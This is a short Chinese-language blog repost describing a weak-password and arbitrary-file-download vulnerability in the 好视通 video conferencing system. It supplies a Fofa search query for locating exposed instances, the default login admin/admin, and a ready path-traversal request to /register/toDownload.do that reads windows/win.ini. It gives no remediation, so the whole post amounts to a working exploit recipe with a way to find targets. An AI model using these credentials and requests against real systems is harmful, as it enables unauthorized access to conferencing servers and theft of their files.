好视通-视频会议存在弱口令&任意文件下载漏洞
生活随笔
收集整理的這篇文章主要介紹了
好视通-视频会议存在弱口令&任意文件下载漏洞
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
描述
系統(tǒng)存在弱口令和任意文件下載漏洞
Fofa
app="好視通-視頻會(huì)議"
弱口令
POC
admin/admin
登錄界面
登錄成功
任意文件下載
POC
/register/toDownload.do?fileName=敏感文件路徑
(https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini)
參考
https://www.adminxe.com/2228.html
總結(jié)
以上是生活随笔為你收集整理的好视通-视频会议存在弱口令&任意文件下载漏洞的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 剑指offer(65)矩阵中的路径
- 下一篇: jdk1.8以前不建议使用其自带的Bas